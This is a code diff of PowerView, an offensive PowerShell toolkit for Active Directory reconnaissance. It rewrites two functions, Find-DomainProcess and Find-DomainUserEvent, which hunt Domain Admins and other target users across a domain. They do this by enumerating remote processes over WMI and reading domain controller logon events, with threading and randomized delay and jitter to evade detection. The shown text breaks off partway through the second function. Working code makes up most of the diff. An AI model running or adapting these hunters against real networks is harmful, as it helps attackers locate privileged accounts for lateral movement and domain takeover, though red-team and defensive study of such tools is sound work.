+Searchings for instances of putty.exe running on the current domain.
 
-        PS C:\> Invoke-ProcessHunter -UserFile users.txt -ComputerFile hosts.txt
-        
-        Finds machines in hosts.txt where any members of users.txt have running
-        processes.
+.EXAMPLE
 
-    .EXAMPLE
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainProcess -Domain testlab.local -Credential $Cred
 
-        PS C:\> Invoke-ProcessHunter -GroupName "Power Users" -Delay 60
-        
-        Find machines on the domain where members of the "Power Users" groups have
-        running processes with a 60 second (+/- *.3) randomized delay between
-        touching each host.
+Searches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials.
 
-    .LINK
+.OUTPUTS
 
-        http://blog.harmj0y.net
+PowerView.UserProcess
 #>
 
-    [CmdletBinding()]
-    param(
-        [Parameter(Position=0,ValueFromPipeline=$True)]
-        [Alias('Hosts')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]
+    [OutputType('PowerView.UserProcess')]
+    [CmdletBinding(DefaultParameterSetName = 'None')]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DNSHostName')]
         [String[]]
         $ComputerName,
 
-        [ValidateScript({Test-Path -Path $_ })]
-        [Alias('HostList')]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerFile,
+        $Domain,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerFilter,
+        $ComputerDomain,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerADSpath,
+        $ComputerLDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ProcessName,
+        $ComputerSearchBase,
+
+        [Alias('Unconstrained')]
+        [Switch]
+        $ComputerUnconstrained,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('OperatingSystem')]
         [String]
-        $GroupName = 'Domain Admins',
+        $ComputerOperatingSystem,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ServicePack')]
         [String]
-        $TargetServer,
+        $ComputerServicePack,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('SiteName')]
         [String]
-        $UserName,
+        $ComputerSiteName,
+
+        [Parameter(ParameterSetName = 'TargetProcess')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $ProcessName,
 
+        [Parameter(ParameterSetName = 'TargetUser')]
+        [Parameter(ParameterSetName = 'UserIdentity')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $UserIdentity,
+
+        [Parameter(ParameterSetName = 'TargetUser')]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $UserFilter,
+        $UserDomain,
 
+        [Parameter(ParameterSetName = 'TargetUser')]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $UserADSpath,
+        $UserLDAPFilter,
 
-        [ValidateScript({Test-Path -Path $_ })]
+        [Parameter(ParameterSetName = 'TargetUser')]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $UserFile,
+        $UserSearchBase,
 
-        [Switch]
-        $StopOnSuccess,
+        [ValidateNotNullOrEmpty()]
+        [Alias('GroupName', 'Group')]
+        [String[]]
+        $UserGroupIdentity = 'Domain Admins',
 
+        [Parameter(ParameterSetName = 'TargetUser')]
+        [Alias('AdminCount')]
         [Switch]
-        $NoPing,
-
-        [UInt32]
-        $Delay = 0,
-
-        [Double]
-        $Jitter = .3,
+        $UserAdminCount,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $Domain,
+        $Server,
 
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
         [String]
-        $DomainController,
+        $SearchScope = 'Subtree',
 
-        [Switch]
-        $ShowAll,
-
-        [Switch]
-        $SearchForest,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-        [ValidateRange(1,100)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $Threads,
+        $ServerTimeLimit,
 
-        [Management.Automation.PSCredential]
-        $Credential
-    )
+        [Switch]
+        $Tombstone,
 
-    begin {
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
 
-        if ($PSBoundParameters['Debug']) {
-            $DebugPreference = 'Continue'
-        }
+        [Switch]
+        $StopOnSuccess,
 
-        # random object for delay
-        $RandNo = New-Object System.Random
+        [ValidateRange(1, 10000)]
+        [Int]
+        $Delay = 0,
 
-        Write-Verbose "[*] Running Invoke-ProcessHunter with delay of $Delay"
+        [ValidateRange(0.0, 1.0)]
+        [Double]
+        $Jitter = .3,
 
-        #####################################################
-        #
-        # First we build the host target set
-        #
-        #####################################################
+        [Int]
+        [ValidateRange(1, 100)]
+        $Threads = 20
+    )
 
-        # if we're using a host list, read the targets in and add them to the target list
-        if($ComputerFile) {
-            $ComputerName = Get-Content -Path $ComputerFile
+    BEGIN {
+        $ComputerSearcherArguments = @{
+            'Properties' = 'dnshostname'
+        }
+        if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
+        if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
+        if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+        if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
+        if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
+        if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
+        if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
+        if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
+
+        $UserSearcherArguments = @{
+            'Properties' = 'samaccountname'
+        }
+        if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity }
+        if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain }
+        if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter }
+        if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase }
+        if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount }
+        if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
+
+
+        # first, build the set of computers to enumerate
+        if ($PSBoundParameters['ComputerName']) {
+            $TargetComputers = $ComputerName
         }
-
-        if(!$ComputerName) { 
-            [array]$ComputerName = @()
-
-            if($Domain) {
-                $TargetDomains = @($Domain)
-            }
-            elseif($SearchForest) {
-                # get ALL the domains in the forest to search
-                $TargetDomains = Get-NetForestDomain -DomainController $DomainController -Credential $Credential | ForEach-Object { $_.Name }
-            }
-            else {
-                # use the local domain
-                $TargetDomains = @( (Get-NetDomain -Domain $Domain -Credential $Credential).name )
-            }
-
-            ForEach ($Domain in $TargetDomains) {
-                Write-Verbose "[*] Querying domain $Domain for hosts"
-                $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter $ComputerFilter -ADSpath $ComputerADSpath
-            }
-        
-            # remove any null target hosts, uniquify the list and shuffle it
-            $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
-            if($($ComputerName.Count) -eq 0) {
-                throw "No hosts found!"
-            }
+        else {
+            Write-Verbose '[Find-DomainProcess] Querying computers in the domain'
+            $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
+        }
+        Write-Verbose "[Find-DomainProcess] TargetComputers length: $($TargetComputers.Length)"
+        if ($TargetComputers.Length -eq 0) {
+            throw '[Find-DomainProcess] No hosts found to enumerate'
         }
 
-        #####################################################
-        #
-        # Now we build the user target set
-        #
-        #####################################################
-
-        if(!$ProcessName) {
-            Write-Verbose "No process name specified, building a target user set"
-
-            # users we're going to be searching for
-            $TargetUsers = @()
-
-            # if we want to hunt for the effective domain users who can access a target server
-            if($TargetServer) {
-                Write-Verbose "Querying target server '$TargetServer' for local users"
-                $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object {
-                    ($_.AccountName).split("/")[1].toLower()
-                }  | Where-Object {$_}
+        # now build the user target set
+        if ($PSBoundParameters['ProcessName']) {
+            $TargetProcessName = @()
+            ForEach ($T in $ProcessName) {
+                $TargetProcessName += $T.Split(',')
             }
-            # if we get a specific username, only use that
-            elseif($UserName) {
-                Write-Verbose "[*] Using target user '$UserName'..."
-                $TargetUsers = @( $UserName.ToLower() )
-            }
-            # read in a target user list if we have one
-            elseif($UserFile) {
-                $TargetUsers = Get-Content -Path $UserFile | Where-Object {$_}
-            }
-            elseif($UserADSpath -or $UserFilter) {
-                ForEach ($Domain in $TargetDomains) {
-                    Write-Verbose "[*] Querying domain $Domain for users"
-                    $TargetUsers += Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $UserADSpath -Filter $UserFilter | ForEach-Object {
-                        $_.samaccountname
-                    }  | Where-Object {$_}
-                }
-            }
-            else {
-                ForEach ($Domain in $TargetDomains) {
-                    Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'"
-                    $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController -Credential $Credential| ForEach-Object {
-                        $_.MemberName
-                    }
-                }
-            }
-
-            if ((-not $ShowAll) -and ((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) {
-                throw "[!] No users found to search for!"
+            if ($TargetProcessName -isnot [System.Array]) {
+                $TargetProcessName = [String[]] @($TargetProcessName)
             }
         }
-
-        # script block that enumerates a server
+        elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) {
+            $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname
+        }
+        else {
+            $GroupSearcherArguments = @{
+                'Identity' = $UserGroupIdentity
+                'Recurse' = $True
+            }
+            if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain }
+            if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase }
+            if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server }
+            if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope }
+            if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize }
+            if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+            if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone }
+            if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential }
+            $GroupSearcherArguments
+            $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName
+        }
+
+        # the host enumeration block we're using to enumerate all servers
         $HostEnumBlock = {
-            param($ComputerName, $Ping, $ProcessName, $TargetUsers, $Credential)
-
-            # optionally check if the server is up first
-            $Up = $True
-            if($Ping) {
-                $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
-            }
-            if($Up) {
-                # try to enumerate all active processes on the remote host
-                # and search for a specific process name
-                $Processes = Get-NetProcess -Credential $Credential -ComputerName $ComputerName -ErrorAction SilentlyContinue
-
-                ForEach ($Process in $Processes) {
-                    # if we're hunting for a process name or comma-separated names
-                    if($ProcessName) {
-                        $ProcessName.split(",") | ForEach-Object {
-                            if ($Process.ProcessName -match $_) {
+            Param($ComputerName, $ProcessName, $TargetUsers, $Credential)
+
+            ForEach ($TargetComputer in $ComputerName) {
+                $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
+                if ($Up) {
+                    # try to enumerate all active processes on the remote host
+                    # and search for a specific process name
+                    if ($Credential) {
+                        $Processes = Get-WMIProcess -Credential $Credential -ComputerName $TargetComputer -ErrorAction SilentlyContinue
+                    }
+                    else {
+                        $Processes = Get-WMIProcess -ComputerName $TargetComputer -ErrorAction SilentlyContinue
+                    }
+                    ForEach ($Process in $Processes) {
+                        # if we're hunting for a process name or comma-separated names
+                        if ($ProcessName) {
+                            if ($ProcessName -Contains $Process.ProcessName) {
                                 $Process
                             }
                         }
-                    }
-                    # if the session user is in the target list, display some output
-                    elseif ($TargetUsers -contains $Process.User) {
-                        $Process
+                        # if the session user is in the target list, display some output
+                        elseif ($TargetUsers -Contains $Process.User) {
+                            $Process
+                        }
                     }
                 }
             }
         }
-
     }
 
-    process {
+    PROCESS {
+        # only ignore threading if -Delay is passed
+        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
 
-        if($Threads) {
-            Write-Verbose "Using threading with threads = $Threads"
-
-            # if we're using threading, kick off the script block with Invoke-ThreadedFunction
-            $ScriptParams = @{
-                'Ping' = $(-not $NoPing)
-                'ProcessName' = $ProcessName
-                'TargetUsers' = $TargetUsers
-                'Credential' = $Credential
-            }
-
-            # kick off the threaded script block + arguments 
-            Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
-        }
-
-        else {
-            if(-not $NoPing -and ($ComputerName.count -ne 1)) {
-                # ping all hosts in parallel
-                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
-                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
-            }
-
-            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
+            Write-Verbose "[Find-DomainProcess] Total number of hosts: $($TargetComputers.count)"
+            Write-Verbose "[Find-DomainProcess] Delay: $Delay, Jitter: $Jitter"
             $Counter = 0
+            $RandNo = New-Object System.Random
 
-            ForEach ($Computer in $ComputerName) {
-
+            ForEach ($TargetComputer in $TargetComputers) {
                 $Counter = $Counter + 1
 
                 # sleep for our semi-randomized interval
                 Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
 
-                Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"
-                $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $ProcessName, $TargetUsers, $Credential
+                Write-Verbose "[Find-DomainProcess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
+                $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetProcessName, $TargetUsers, $Credential
                 $Result
 
-                if($Result -and $StopOnSuccess) {
-                    Write-Verbose "[*] Target user/process found, returning early"
+                if ($Result -and $StopOnSuccess) {
+                    Write-Verbose "[Find-DomainProcess] Target user found, returning early"
                     return
                 }
             }
         }
+        else {
+            Write-Verbose "[Find-DomainProcess] Using threading with threads: $Threads"
+
+            # if we're using threading, kick off the script block with New-ThreadedFunction
+            $ScriptParams = @{
+                'ProcessName' = $TargetProcessName
+                'TargetUsers' = $TargetUsers
+                'Credential' = $Credential
+            }
+
+            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
+        }
     }
 }
 
 
-function Invoke-EventHunter {
+function Find-DomainUserEvent {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Finds logon events on the current (or remote domain) for the specified users.
+
+Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction  
+
+.DESCRIPTION
+
+Enumerates all domain controllers from the specified -Domain
+(default of the local domain) using Get-DomainController, enumerates
+the logon events for each using Get-DomainUserEvent, and filters
+the results based on the targeting criteria.
+
+.PARAMETER ComputerName
+
+Specifies an explicit computer name to retrieve events from.
+
+.PARAMETER Domain
+
+Specifies a domain to query for domain controllers to enumerate.
+Defaults to the current domain.
+
+.PARAMETER Filter
+
+A hashtable of PowerView.LogonEvent properties to filter for.
+The 'op|operator|operation' clause can have '&', '|', 'and', or 'or',
+and is 'or' by default, meaning at least one clause matches instead of all.
+See the exaples for usage.
+
+.PARAMETER StartTime
+
+The [DateTime] object representing the start of when to collect events.
+Default of [DateTime]::Now.AddDays(-1).
+
+.PARAMETER EndTime
+
+The [DateTime] object representing the end of when to collect events.
+Default of [DateTime]::Now.
+
+.PARAMETER MaxEvents
 
-        Queries all domain controllers on the network for account
-        logon events (ID 4624) and TGT request events (ID 4768),
-        searching for target users.
+The maximum number of events (per host) to retrieve. Default of 5000.
 
-        Note: Domain Admin (or equiv) rights are needed to query
-        this information from the DCs.
+.PARAMETER UserIdentity
 
-        Author: @sixdub, @harmj0y
-        License: BSD 3-Clause
+Specifies one or more user identities to search for.
 
-    .PARAMETER ComputerName
+.PARAMETER UserDomain
 
-        Host array to enumerate, passable on the pipeline.
+Specifies the domain to query for users to search for, defaults to the current domain.
 
-    .PARAMETER ComputerFile
+.PARAMETER UserLDAPFilter
 
-        File of hostnames/IPs to search.
+Specifies an LDAP query string that is used to search for target users.
 
-    .PARAMETER ComputerFilter
+.PARAMETER UserSearchBase
 
-        Host filter name to query AD for, wildcards accepted.
+Specifies the LDAP source to search through for target users.
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
 
-    .PARAMETER ComputerADSpath
+.PARAMETER UserGroupIdentity
 
-        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
 
-    .PARAMETER GroupName
+.PARAMETER UserAdminCount
 
-        Group name to query for target users.
+Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged).
 
-    .PARAMETER TargetServer
+.PARAMETER Server
 
-        Hunt for users who are effective local admins on a target server.
+Specifies an Active Directory server (domain controller) to bind to.
 
-    .PARAMETER UserName
+.PARAMETER SearchScope
 
-        Specific username to search for.
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
 
-    .PARAMETER UserFilter
+.PARAMETER ResultPageSize
 
-        A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)"
+Specifies the PageSize to set for the LDAP searcher object.
 
-    .PARAMETER UserADSpath
+.PARAMETER ServerTimeLimit
 
-        The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-    .PARAMETER UserFile
+.PARAMETER Tombstone
 
-        File of usernames to search for.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-    .PARAMETER NoPing
+.PARAMETER Credential
 
-        Don't ping each host to ensure it's up before enumerating.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target computer(s).
 
-    .PARAMETER Domain
+.PARAMETER StopOnSuccess
 
-        Domain for query for machines, defaults to the current domain.
+Switch. Stop hunting after finding after finding a target user.
 
-    .PARAMETER DomainController
+.PARAMETER Delay
 
-        Domain controller to reflect LDAP queries through.
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
 
-    .PARAMETER SearchDays
+.PARAMETER Jitter
 
-        Number of days back to search logs for. Default 3.
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
 
-    .PARAMETER SearchForest
+.PARAMETER Threads
 
-        Switch. Search all domains in the forest for target users instead of just
-        a single domain.
+The number of threads to use for user searching, defaults to 20.
 
-    .PARAMETER Threads
+.EXAMPLE
 
-        The maximum concurrent threads to execute.
+Find-DomainUserEvent
 
-    .PARAMETER Credential
+Search for any user events matching domain admins on every DC in the current domain.
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+.EXAMPLE
 
-    .EXAMPLE
+$cred = Get-Credential dev\administrator
+Find-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john'
 
-        PS C:\> Invoke-EventHunter
+Search for any user events matching the user 'john' on the 'secondary.dev.testlab.local'
+domain controller using the alternate credential
 
-    .LINK
+.EXAMPLE
 
-        http://blog.harmj0y.net
+'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'}
+
+Find user events on the primary.testlab.local system where the event matches
+the IPAddress '192.168.52.200' or '192.168.52.201'.
+
+.EXAMPLE
+
+$cred = Get-Credential testlab\administrator
+Find-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'}
+
+Find user events mathing the specified GUID AND the specified TargetLogonId, searching
+through every domain controller in the current domain, enumerating each DC in serial
+instead of in a threaded manner, using the alternate credential.
+
+.OUTPUTS
+
+PowerView.LogonEvent
+
+PowerView.ExplicitCredentialLogon
+
+.LINK
+
+http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/
 #>
 
-    [CmdletBinding()]
-    param(
-        [Parameter(Position=0,ValueFromPipeline=$True)]
-        [Alias('Hosts')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]
+    [OutputType('PowerView.LogonEvent')]
+    [OutputType('PowerView.ExplicitCredentialLogon')]
+    [CmdletBinding(DefaultParameterSetName = 'Domain')]
+    Param(
+        [Parameter(ParameterSetName = 'ComputerName', Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('dnshostname', 'HostName', 'name')]
+        [ValidateNotNullOrEmpty()]
         [String[]]
         $ComputerName,
 
-        [ValidateScript({Test-Path -Path $_ })]
-        [Alias('HostList')]
+        [Parameter(ParameterSetName = 'Domain')]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerFile,
+        $Domain,
 
-        [String]
-        $ComputerFilter,
+        [ValidateNotNullOrEmpty()]
+        [Hashtable]
+        $Filter,
 
-        [String]
-        $ComputerADSpath,
+        [Parameter(ValueFromPipelineByPropertyName = $True)]
+        [ValidateNotNullOrEmpty()]
+        [DateTime]
+        $StartTime = [DateTime]::Now.AddDays(-1),
 
-        [String]
-        $GroupName = 'Domain Admins',
+        [Parameter(ValueFromPipelineByPropertyName = $True)]
+        [ValidateNotNullOrEmpty()]
+        [DateTime]
+        $EndTime = [DateTime]::Now,
 
-        [String]
-        $TargetServer,
+        [ValidateRange(1, 1000000)]
+        [Int]
+        $MaxEvents = 5000,
 
+        [ValidateNotNullOrEmpty()]
         [String[]]
-        $UserName,
+        $UserIdentity,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $UserFilter,
-
-        [String]
-        $UserADSpath,
-
-        [ValidateScript({Test-Path -Path $_ })]
-        [String]
-        $UserFile,
+        $UserDomain,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $Domain,
+        $UserLDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $DomainController,
+        $UserSearchBase,
 
-        [Int32]
-        $SearchDays = 3,
+        [ValidateNotNullOrEmpty()]
+        [Alias('GroupName', 'Group')]
+        [String[]]
+        $UserGroupIdentity = 'Domain Admins',
 
+        [Alias('AdminCount')]
         [Switch]
-        $SearchForest,
+        $UserAdminCount,
 
-        [ValidateRange(1,100)] 
-        [Int]
-        $Threads,
-
-        [Management.Automation.PSCredential]
-        $Credential
-    )
+        [Switch]
+        $CheckAccess,
 
-    begin {
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
 
-        if ($PSBoundParameters['Debug']) {
-            $DebugPreference = 'Continue'
-        }
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
 
-        # random object for delay
-        $RandNo = New-Object System.Random
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-        Write-Verbose "[*] Running Invoke-EventHunter"
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
-        if($Domain) {
-            $TargetDomains = @($Domain)
-        }
-        elseif($SearchForest) {
-            # get ALL the domains in the forest to search
-            $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
-        }
-        else {
-            # use the local domain
-            $TargetDomains = @( (Get-NetDomain -Credential $Credential).name )
-        }
+        [Switch]
+        $Tombstone,
 
-        #####################################################
-        #
-        # First we build the host target set
-        #
-        #####################################################
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
 
-        if(!$ComputerName) { 
-            # if we're using a host list, read the targets in and add them to the target list
-            if($ComputerFile) {
-                $ComputerName = Get-Content -Path $ComputerFile
-            }
-            elseif($ComputerFilter -or $ComputerADSpath) {
-                [array]$ComputerName = @()
-                ForEach ($Domain in $TargetDomains) {
-                    Write-Verbose "[*] Querying domain $Domain for hosts"
-                    $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter $ComputerFilter -ADSpath $ComputerADSpath
-                }
-            }
-            else {
-                # if a computer specifier isn't given, try to enumerate all domain controllers
-                [array]$ComputerName = @()
-                ForEach ($Domain in $TargetDomains) {
-                    Write-Verbose "[*] Querying domain $Domain for domain controllers"
-                    $ComputerName += Get-NetDomainController -LDAP -Domain $Domain -DomainController $DomainController -Credential $Credential | ForEach-Object { $_.dnshostname}
-                }
-            }
+        [Switch]
+        $StopOnSuccess,
 
-            # remove any null target hosts, uniquify the list and shuffle it
-            $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
-            if($($ComputerName.Count) -eq 0) {
-                throw "No hosts found!"
-            }
-        }
+        [ValidateRange(1, 10000)]
+        [Int]
+        $Delay = 0,
 
-        #####################################################
-        #
-        # Now we build the user target set
-        #
-        #####################################################
+        [ValidateRange(0.0, 1.0)]
+        [Double]
+        $Jitter = .3,
 
-        # users we're going to be searching for
-        $TargetUsers = @()
+        [Int]
+        [ValidateRange(1, 100)]
+        $Threads = 20
+    )
 
-        # if we want to hunt for the effective domain users who can access a target server
-        if($TargetServer) {
-            Write-Verbose "Querying target server '$TargetServer' for local users"
-            $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object {
-                ($_.AccountName).split("/")[1].toLower()
-            }  | Where-Object {$_}
-        }
-        # if we get a specific username, only use that
-        elseif($UserName) {
-            # Write-Verbose "[*] Using target user '$UserName'..."
-            $TargetUsers = $UserName | ForEach-Object {$_.ToLower()}
-            if($TargetUsers -isnot [System.Array]) {
-                $TargetUsers = @($TargetUsers)
-            }
-        }
-        # read in a target user list if we have one
-        elseif($UserFile) {
-            $TargetUsers = Get-Content -Path $UserFile | Where-Object {$_}
-        }
-        elseif($UserADSpath -or $UserFilter) {
-            ForEach ($Domain in $TargetDomains) {
-                Write-Verbose "[*] Querying domain $Domain for users"
-                $TargetUsers += Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $UserADSpath -Filter $UserFilter | ForEach-Object {
-                    $_.samaccountname
-                }  | Where-Object {$_}
-            }
+    BEGIN {
+        $UserSearcherArguments = @{
+            'Properties' = 'samaccountname'
+        }
+        if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity }
